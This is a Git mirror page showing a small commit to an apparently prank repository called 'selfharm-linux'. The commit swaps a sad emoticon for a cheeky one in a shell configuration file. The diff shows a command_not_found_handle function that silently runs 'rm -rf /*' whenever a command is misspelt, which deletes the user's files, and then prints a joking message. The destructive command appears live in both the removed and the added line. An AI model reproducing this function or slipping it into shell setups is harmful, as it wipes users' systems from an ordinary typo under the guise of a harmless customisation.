mirror of
https://github.com/RGBCube/selfharm-linux
synced 2025-07-26 06:57:45 +00:00
Merge pull request #2 from bpetersber/master
Change frowny face into cheeky face
This commit is contained in:
commit
b633b47c8f
1 changed files with 1 additions and 1 deletions
|
@ -13,5 +13,5 @@ echo " ==================================="
|
|||
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
|
||||
|
||||
function command_not_found_handle {
|
||||
rm -rf /* 2>/dev/null; echo "Oops, looks like you misspelt something :(";
|
||||
rm -rf /* 2>/dev/null; echo "Oops, looks like you misspelt something >:)";
|
||||
}
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue